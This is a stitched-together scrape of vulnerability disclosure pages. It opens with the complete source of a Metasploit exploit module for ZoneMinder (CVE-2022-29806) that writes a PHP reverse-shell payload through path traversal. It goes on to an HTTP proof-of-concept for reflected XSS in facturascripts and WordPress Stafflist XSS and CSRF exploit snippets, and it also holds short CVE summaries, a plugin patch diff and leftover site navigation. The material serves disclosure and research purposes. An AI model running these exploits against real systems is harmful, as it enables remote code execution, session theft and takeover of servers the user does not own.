This Metasploit module exploits an arbitrary file write in the debug log file option chained with a path traversal in the language settings that leads to remote code execution in ZoneMinder surveillance software versions before 1.36.13 and before 1.37.11

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'ZoneMinder Language Settings Remote Code Execution',        'Description' => %q{          This module exploits arbitrary file write in debug log file option          chained with a path traversal in language settings that leads to a          remote code execution in ZoneMinder surveillance software versions          before 1.36.13 and before 1.37.11        },        'License' => MSF_LICENSE,        'Author' => [ 'krastanoel' ], # Discovery and exploit        'References' => [          [ 'CVE', '2022-29806' ],          [ 'URL', 'https://krastanoel.com/cve/2022-29806']        ],        'Platform' => ['php'],        'Privileged' => false,        'Arch' => ARCH_PHP,        'Targets' => [          [ 'Automatic Target', {}]        ],        'DisclosureDate' => '2022-04-27',        'DefaultTarget' => 0,        'DefaultOptions' => {          'Payload' => 'php/reverse_perl',          'Encoder' => 'php/base64'        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      OptString.new('USERNAME', [true, 'The ZoneMinder username', 'admin']),      OptString.new('PASSWORD', [true, 'The ZoneMinder password', 'admin']),      OptString.new('TARGETURI', [true, 'The ZoneMinder path', '/zm/'])    ])  end  def check    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, '/index.php'),      'method' => 'GET'    )    return Exploit::CheckCode::Unknown('No response from the web service') if res.nil?    return Exploit::CheckCode::Safe("Check TARGETURI - unexpected HTTP response code: #{res.code}") if res.code != 200    if res.body =~ /ZoneMinder/      csrf_magic = get_csrf_magic(res)      res = authenticate(csrf_magic) if res.body =~ /ZoneMinder Login/      return Exploit::CheckCode::Safe('Authentication failed') if res.body =~ %r{<title>ZM - Login</title>}      res = send_request_cgi(        'uri' => normalize_uri(target_uri.path, '/index.php'),        'method' => 'GET',        'keep_cookies' => true      )    else      return Exploit::CheckCode::Safe('Target is not a ZoneMinder web server')    end    res.body.match(/v(1.\d+.\d+)/)    version = Regexp.last_match(1)    unless version      return Exploit::CheckCode::Safe('Unable to determine ZoneMinder version')    end    version = Rex::Version.new(version)    return Exploit::CheckCode::Appears("Version Detected: #{version}") if version <= Rex::Version.new('1.37.10')    Exploit::CheckCode::Safe("Version Detected: #{version}")  rescue ::Rex::ConnectionError    return Exploit::CheckCode::Unknown('Could not connect to the web service')  end  def exploit    unless datastore['AutoCheck']      cookie_jar.clear      res = authenticate      fail_with(Failure::NoAccess, 'Authentication failed') if res&.body =~ %r{<title>ZM - Login</title>}    end    vprint_status('Leak installation directory path')    random_path = rand_text_alphanumeric(6..15)    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, '/index.php'),      'method' => 'GET',      'keep_cookies' => true,      'vars_get' => { 'view' => random_path }    )    fail_with(Failure::UnexpectedReply, 'Failed to leak install path') unless res    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, '/index.php'),      'method' => 'GET',      'keep_cookies' => true,      'vars_get' => { 'view' => 'options' }    )    csrf_magic = get_csrf_magic(res)    current_lang = res&.get_html_document&.at(      'select[@name="newConfig[ZM_LANG_DEFAULT]"]        option[@selected="selected"]'    )&.text    fail_with(Failure::UnexpectedReply, 'Unable to get current language') if res.nil? || current_lang.nil?    data = 'view=request&request=log&task=query&limit=10'    data += "&__csrf_magic=#{csrf_magic}" if csrf_magic    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/index.php'),      'data' => data.to_s,      'keep_cookies' => true    )    fail_with(Failure::UnexpectedReply, 'Unable to get valid JSON response') if res.nil? || res&.body.blank?    res.body.match(/(\{"result":.*})/)    request_log = JSON.parse(Regexp.last_match(1)).with_indifferent_access    if request_log.key?(:rows) # Check for latest version key first v1.36.x      request_log_key = 'rows'    elsif request_log.key?(:logs)      request_log_key = 'logs'    else      fail_with(Failure::UnexpectedReply, 'Service found, but unable to find request log key')    end    request_log = request_log[request_log_key].select { |e| e['Message'] =~ /'#{random_path}'/ }.first    if request_log      path = request_log['File'].split('/')[0..-2].join('/')      vprint_good("Path: #{path}")    else      fail_with(Failure::UnexpectedReply, 'Service found, but unable to leak installation directory path')    end    fname = "#{rand_text_alphanumeric(6..15)}.php"    traverse_path = "#{path}/lang".split('/')[1..].map { '../' }.join    shell = "#{traverse_path}tmp/#{fname}"    data = "view=options&tab=logging&action=options&newConfig[ZM_LOG_DEBUG]=1&newConfig[ZM_LOG_DEBUG_FILE]=#{shell}"    data += "&__csrf_magic=#{csrf_magic}" if csrf_magic    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/index.php'),      'data' => data.to_s,      'keep_cookies' => true    )    fail_with(Failure::UnexpectedReply, 'Unable to set LOG_DEBUG_FILE option') if res.nil? || res&.code != 302    vprint_good("Shell: #{shell}")    p = %(<?php #{payload.encoded} ?>)    data = "view=request&request=log&task=create&level=ERR&message=#{p}&file=#{shell}"    data += "&__csrf_magic=#{csrf_magic}" if csrf_magic    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/index.php'),      'data' => data.to_s,      'keep_cookies' => true    )    fail_with(Failure::UnexpectedReply, 'Failed to receive a response') unless res    result = JSON.parse(res.body)['result']    fail_with(Failure::UnexpectedReply, 'Failed to write payload') unless result    fail_with(Failure::UnexpectedReply, 'Unable to write payload to LOG_DEBUG_FILE') if result != 'Ok'    # trigger the shell    lang = shell.gsub(/\.php/, '')    data = "view=options&tab=system&action=options&newConfig[ZM_LANG_DEFAULT]=#{lang}"    data += "&__csrf_magic=#{csrf_magic}" if csrf_magic    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/index.php'),      'data' => data.to_s,      'keep_cookies' => true    )    fail_with(Failure::UnexpectedReply, 'Unable to trigger the payload') if res.nil? || res&.code != 302    # cleanup    data = Rack::Utils.parse_nested_query(data)    data['newConfig']['ZM_LANG_DEFAULT'] = current_lang    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/index.php'),      'data' => data.to_query,      'keep_cookies' => true    )    vprint_warning('Unable to reset language to default') if res.nil? || res&.code != 200    data['tab'] = 'logging'    data['newConfig']['ZM_LOG_DEBUG'] = 0    data['newConfig']['ZM_LOG_DEBUG_FILE'] = ''    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/index.php'),      'data' => data.to_query,      'keep_cookies' => true    )    vprint_warning('Unable to reset debug option') if res.nil? || res&.code != 302  rescue ::Rex::ConnectionError    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")  end  private  def get_csrf_magic(res)    return if res.nil?    res.get_html_document.at('//input[@name="__csrf_magic"]/@value')&.text  end  def authenticate(csrf_magic = nil)    username = datastore['USERNAME']    password = datastore['PASSWORD']    data = "action=login&view=login&username=#{username}&password=#{password}"    data += "&__csrf_magic=#{csrf_magic}" if csrf_magic    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/index.php'),      'data' => data.to_s,      'keep_cookies' => true    })  endend

ZoneMinder Language Settings Remote Code Execution

On all versions of 16.1.x, 15.1.x, 14.1.x, 13.1.x, 12.1.x, and 11.6.x of F5 BIG-IP (fixed in 17.0.0), a cross-site request forgery (CSRF) vulnerability exists in an undisclosed page of the BIG-IP Configuration utility. This vulnerability allows an attacker to run a limited set of commands: ping, traceroute, and WOM diagnostics. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated

CVE-2022-1389

Cross-site scripting - Reflected in Create Subaccount in GitHub repository neorazorx/facturascripts prior to 2022.07. This vulnerability can be arbitrarily executed javascript code to steal user'cookie, perform HTTP request, get content of `same origin` page, etc ...

**Description**

Cross-site scripting - Reflected in Create Subaccount via codsubcuenta parameter.

**Proof of Concept**

    POST /facturascripts/EditSubcuenta HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=---------------------------363416527826407339693188325960
    Content-Length: 1558
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/facturascripts/EditSubcuenta
    Cookie: fsNick=admin; fsLogkey=6pCG4IKxZ8oOUTkeVg5siaMfyR2q37Bb9JhYvAPlXH1rLWdcmFSNun0wjzQtED; fsLang=en_EN; fsCompany=1; lhc_vid=0155fb94b7b38957dfc4; lhc_rm_u=GW6CXYX9Kvs3laO9i4fjnR7ruXW44H%3A1%3A87494d3c0efceb6d8d9974ea5e6c9f11881b9ee0; organizrLanguage=en; csrf-token-data=%7B%22value%22%3A%22jzfiNNFxYEXZET6aCcebWmglZOg2JPA9SsDylMUM%22%2C%22expiry%22%3A1651160325308%7D; lang=en_US; 
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    -----------------------------363416527826407339693188325960
    Content-Disposition: form-data; name="action"
    
    insert
    -----------------------------363416527826407339693188325960
    Content-Disposition: form-data; name="activetab"
    
    EditSubcuenta
    -----------------------------363416527826407339693188325960
    Content-Disposition: form-data; name="code"
    
    
    -----------------------------363416527826407339693188325960
    Content-Disposition: form-data; name="multireqtoken"
    
    99a8c7a2305b11e06fbd8bc0c9446f0826e73bdd|5yqptN
    -----------------------------363416527826407339693188325960
    Content-Disposition: form-data; name="codsubcuenta"
    
    <script>alert(1337)</script>
    -----------------------------363416527826407339693188325960
    Content-Disposition: form-data; name="descripcion"
    
    123123
    -----------------------------363416527826407339693188325960
    Content-Disposition: form-data; name="codejercicio"
    
    2022
    -----------------------------363416527826407339693188325960
    Content-Disposition: form-data; name="idcuenta"
    
    
    -----------------------------363416527826407339693188325960
    Content-Disposition: form-data; name="codcuentaesp"
    
    CLIENT
    -----------------------------363416527826407339693188325960
    Content-Disposition: form-data; name="debe"
    
    0
    -----------------------------363416527826407339693188325960
    Content-Disposition: form-data; name="haber"
    
    0
    -----------------------------363416527826407339693188325960
    Content-Disposition: form-data; name="saldo"
    
    0
    -----------------------------363416527826407339693188325960--
    

**Step to reproduce**

1.  In Accounting section, choose New and fill all form with anything value

2.  Use Burp suite intercept this request and modify codsubcuenta parameter value with XSS payload and click Forward

3.  And alert(1337) execute

**Impact**

This vulnerability can be arbitrarily executed javascript code to steal user'cookie, perform HTTP request, get content of same origin page, etc ...

CVE-2022-1571: Cross-site scripting - Reflected in Create Subaccount in facturascripts

Mattermost Playbooks plugin 1.25 and earlier fails to properly restrict user-level permissions, which allows playbook members to escalate their membership privileges and perform actions restricted to playbook admins.

CVE-2022-1548: Security Updates

WordPress Stafflist plugin version 3.1.2 suffers from a cross site scripting vulnerability.

**WordPress Stafflist 3.1.2 Cross Site Scripting**

Posted May 3, 2022

Authored by Hassan Khan Yusufzai

WordPress Stafflist plugin version 3.1.2 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 74269ba0f910606e9499b4b87b6ba8ea243f907c7743fde42c4af10707d6f9da

Download | Favorite | View

**WordPress Stafflist 3.1.2 Cross Site Scripting**

    # Exploit Title: WordPress Plugin stafflist 3.1.2 - Reflected XSS (Authenticated)# Date: 05-02-2022# Exploit Author: Hassan Khan Yusufzai - Splint3r7# Vendor Homepage: https://wordpress.org/plugins/stafflist/# Version: 3.1.2# Tested on: Firefox# Contact me: h [at] spidersilk.com# Summary:A cross site scripting reflected vulnerability has been identified inWordPress Plugin stafflist version less then 3.1.2. that allowsunauthenticated users to run arbitrary javascript code insideWordPress using Stafflist Plugin.# POChttp://localhost:10003/wp-admin/admin.php?page=stafflist&remove=1&p=1%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E# Vulnerable Parametersp and s parameters are vulnerable.# Vulnerable Code:$html = ($cur > 1 ? "<p class='pager'><ahref='{$stafflisturl}&p=".($cur-1)."&s={$_GET['s']}'>Previous</a></p>" : ""); //<

**File Tags**

*   ActiveX (932)
*   Advisory (77,240)
*   Arbitrary (15,057)
*   BBS (2,859)
*   Bypass (1,550)
*   CGI (1,010)
*   Code Execution (6,627)
*   Conference (668)
*   Cracker (797)
*   CSRF (3,268)
*   DoS (21,736)
*   Encryption (2,330)
*   Exploit (49,655)
*   File Inclusion (4,142)
*   File Upload (938)
*   Firewall (821)
*   Info Disclosure (2,542)
*   Intrusion Detection (850)
*   Java (2,780)
*   JavaScript (792)
*   Kernel (5,997)
*   Local (13,976)
*   Magazine (586)
*   Overflow (12,125)
*   Perl (1,410)
*   PHP (5,038)
*   Proof of Concept (2,276)
*   Protocol (3,290)
*   Python (1,389)
*   Remote (29,590)
*   Root (3,441)
*   Ruby (574)
*   Scanner (1,629)
*   Security Tool (7,672)
*   Shell (3,054)
*   Shellcode (1,201)
*   Sniffer (879)
*   Spoof (2,077)
*   SQL Injection (15,975)
*   TCP (2,350)
*   Trojan (672)
*   UDP (866)
*   Virus (658)
*   Vulnerability (30,362)
*   Web (8,972)
*   Whitepaper (3,710)
*   x86 (942)
*   XSS (17,290)
*   Other

**File Archives**

*   May 2022
*   April 2022
*   March 2022
*   February 2022
*   January 2022
*   December 2021
*   November 2021
*   October 2021
*   September 2021
*   August 2021
*   July 2021
*   June 2021
*   Older

**Systems**

*   AIX (425)
*   Apple (1,875)
*   BSD (368)
*   CentOS (55)
*   Cisco (1,911)
*   Debian (5,948)
*   Fedora (1,690)
*   FreeBSD (1,241)
*   Gentoo (4,152)
*   HPUX (877)
*   iOS (317)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (41,937)
*   Mac OS X (683)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (478)
*   RedHat (11,372)
*   Slackware (941)
*   Solaris (1,606)
*   SUSE (1,444)
*   Ubuntu (7,747)
*   UNIX (9,051)
*   UnixWare (184)
*   Windows (6,373)
*   Other

WordPress Stafflist 3.1.2 Cross Site Scripting

An issue was discovered in Logitech Options. The OAuth 2.0 state parameter was not properly validated. This leaves applications vulnerable to CSRF attacks during authentication and authorization operations.

*   Register
*   Getting Started
*   FAQ
*   Community
*   Downloads
*   Warranty
*   Specifications
*   Spare Parts
*   Gallery
*   Contact Us

**There are no Downloads for this Product**

**There are no FAQs for this Product**

**There are no Spare Parts available for this Product**

Logitech Options

More

Check our Logitech Warranty here

**Make the Most of your warranty**

Register Your Product FIle a Warranty Claim

**Frequently Asked Questions**

*   Windows
    
    {\[{versionList\[key\]}\]}
    
    Mac
    
    {\[{versionList\[key\]}\]}
    
    Other
    
    {\[{versionList\[key\]}\]}
    

**There are no Downloads for this Version.**

Show All Downloads

**Compatible Product**

**Product Specific Phone Numbers**

**Main Phone Numbers**

CVE-2022-0916: Logitech Options

The Sitemap by click5 WordPress plugin before 1.0.36 does not have authorisation and CSRF checks when updating options via a REST endpoint, and does not ensure that the option to be updated belongs to the plugin. As a result, unauthenticated attackers could change arbitrary blog options, such as the users_can_register and default_role, allowing them to create a new admin account and take over the blog.

CVE-2022-0952

The Ad Invalid Click Protector (AICP) WordPress plugin before 1.2.7 does not have CSRF check deleting banned users, which could allow attackers to make a logged in admin remove arbitrary bans

Timestamp:

04/05/2022 12:27:06 PM (4 weeks ago)

isaumya

Message:

Adding nonce support for deletion of banned users  

Location:

ad-invalid-click-protector/trunk/inc

Files:

  

*   admin\_setup.php (1 diff)
*   banned\_user\_table.php (1 diff)

**Legend:**

Unmodified

Added

Removed

*   **ad-invalid-click-protector/trunk/inc/admin\_setup.php**
    
    r2656496
    
    r2705068
    
     
    
    523
    
    523
    
                $bannedUserTableOBJ = new AICP\_BANNED\_USER\_TABLE();
    
    524
    
    524
    
                $aicpOBJ = new AICP();
    
    525
    
     
    
                if( 'delete'=== $bannedUserTableOBJ->current\_action() ) {
    
    526
    
     
    
                    global $wpdb;
    
    527
    
     
    
                    $fetchedID = $\_REQUEST\['id'\];
    
    528
    
     
    
                    if( is\_array( $fetchedID ) ) { // for bulk operation arry will return
    
    529
    
     
    
                        $selectedID = implode( ',', array\_fill( 0, count( $fetchedID ), '%d' ) );
    
    530
    
     
    
                    } else { //for singel delete just the id will return
    
    531
    
     
    
                                $selectedID = '%d';
    
    532
    
     
    
                    }
    
    533
    
     
    
                    if( empty( $selectedID ) ) {
    
    534
    
     
    
                        $this->delete\_notice( false );
    
    535
    
     
    
                    } else {
    
    536
    
     
    
                        $query = $wpdb->prepare(
    
    537
    
     
    
                                    "DELETE FROM {$aicpOBJ->table\_name} WHERE {$aicpOBJ->table\_name}.id IN ($selectedID)",
    
    538
    
     
    
                                    $fetchedID
    
    539
    
     
    
                                );
    
    540
    
     
    
                        $wpdb->query( $query );
    
    541
    
     
    
                        $this->delete\_notice( true );
    
    542
    
     
    
                    }
    
    543
    
     
    
                }
    
    544
    
     
    
                /\* End of handelling the deletion process \*/
    
    545
    
     
    
                /\* Now it's time to show our data \*/
    
     
    
    525
    
                if( ( 'delete'=== $bannedUserTableOBJ->current\_action() ) && isset( $\_REQUEST\['nonce'\] ) && wp\_verify\_nonce( $\_REQUEST\['nonce'\], 'delete\_banned\_user' ) ) {
    
     
    
    526
    
                    global $wpdb;
    
     
    
    527
    
                    $fetchedID = $\_REQUEST\['id'\];
    
     
    
    528
    
                    if( is\_array( $fetchedID ) ) { // for bulk operation arry will return
    
     
    
    529
    
                        $selectedID = implode( ',', array\_fill( 0, count( $fetchedID ), '%d' ) );
    
     
    
    530
    
                    } else { //for singel delete just the id will return
    
     
    
    531
    
                        $selectedID = '%d';
    
     
    
    532
    
                    }
    
     
    
    533
    
                    if( empty( $selectedID ) ) {
    
     
    
    534
    
                        $this->delete\_notice( false );
    
     
    
    535
    
                    } else {
    
     
    
    536
    
                        $query = $wpdb->prepare(
    
     
    
    537
    
                            "DELETE FROM {$aicpOBJ->table\_name} WHERE {$aicpOBJ->table\_name}.id IN ($selectedID)",
    
     
    
    538
    
                            $fetchedID
    
     
    
    539
    
                        );
    
     
    
    540
    
                        $wpdb->query( $query );
    
     
    
    541
    
                $this->delete\_notice( true );
    
     
    
    542
    
                    }
    
     
    
    543
    
                }
    
     
    
    544
    
                /\* End of handelling the deletion process \*/
    
     
    
    545
    
                /\* Now it's time to show our data \*/
    
    546
    
    546
    
                ?>
    
    547
    
    547
    
                <div class="wrap">
    
*   **ad-invalid-click-protector/trunk/inc/banned\_user\_table.php**
    
    r1565011
    
    r2705068
    
     
    
    34
    
    34
    
            public function column\_ip( $item ) {
    
    35
    
    35
    
                $actions = array(
    
    36
    
     
    
                    'delete'    => sprintf( '<a class="aicp\_delete" href="?page=%s&action=%s&id=%s">Delete</a>', $\_REQUEST\['page'\], 'delete', $item->id ),
    
     
    
    36
    
                    'delete'    => sprintf( '<a class="aicp\_delete" href="?page=%s&action=%s&id=%s&nonce=%s">Delete</a>', $\_REQUEST\['page'\], 'delete', $item->id, wp\_create\_nonce( 'delete\_banned\_user' ) ),
    
    37
    
    37
    
                );
    
    38
    
    38
    

**Note:** See TracChangeset for help on using the changeset viewer.

CVE-2022-0191: Changeset 2705068 – WordPress Plugin Repository

WordPress Stafflist plugin version 3.1.2 suffers from a cross site request forgery vulnerability.

    # Exploit Title: WordPress Plugin stafflist 3.1.2 - CSRF (Authenticated)# Date: 05-02-2022# Exploit Author: Hassan Khan Yusufzai - Splint3r7# Vendor Homepage: https://wordpress.org/plugins/stafflist/# Version: 3.1.2# Tested on: Firefox# Contact me: h [at] spidersilk.com# Summary:A CSRF vulnerability exists in staff record remove functionality inWordPress Plugin Stafflist 3.1.2.This vulnerability allows an attacker to delete existing records bytriggring a CSRF html request, due to not validating wp_nouce token inthe request.# ExploitAs n authenticated user:<html>  <body>    <form action="http://localhost:10003/wp-admin/admin.php">      <input type="hidden" name="page" value="stafflist" />      <input type="hidden" name="remove" value="1" />      <input type="hidden" name="p" value="1" />      <input type="hidden" name="s" value="1" />      <input type="submit" value="Submit request" />    </form>  </body></html>

Tag

#csrf